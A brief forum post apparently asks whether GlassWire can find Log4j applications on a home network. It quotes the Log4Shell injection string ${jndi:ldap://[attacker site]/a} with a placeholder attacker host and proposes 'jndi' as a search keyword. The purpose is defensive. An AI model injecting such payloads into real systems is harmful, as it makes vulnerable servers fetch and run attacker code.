Question for you guys regarding the Log4j zero-day.
Can I use glasswire to find applications running log4j on my personal network?
From what I understand you should be able to query based on the HTTP request that is traveling outbound:
${jndi:ldap://[attacker site]/a}
Some hackers are aware of this, and have been modifying the outbound queries, but the surefire string to search on would be “jndi”. Please help me use this tool to identify log4j requests from the various applications that I use on my computer. I want to make sure that I am reasonably covering my bases here.
More info on Log4J if you’re new to the convo:
Techinical:
Technicalish:
Reddit: